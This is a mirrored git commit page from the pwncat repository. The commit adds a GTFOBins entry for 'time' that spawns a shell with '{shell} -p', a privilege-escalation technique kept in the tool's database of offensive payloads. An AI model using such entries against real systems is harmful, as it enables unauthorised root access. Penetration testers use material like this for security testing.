1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-23 17:15:38 +01:00

Added time as a GTFOBins

This commit is contained in:
John Hammond 2020-05-24 01:12:51 -04:00
parent d8f2cbc85c
commit a4e8767563

View File

@ -861,9 +861,18 @@
//-------------------------------------------------------------------
// `tftp` should be in place, but we do not yet have capabilities
// to upload and download a file sanely with GTFObins.
// That might be best in its own privesc method.
//-------------------------------------------------------------------
"time": [
{
"type": "shell",
"payload": "{command}",
"args": ["{shell}", "-p"]
}
],
//-------------------------------------------------------------------
"timeout": [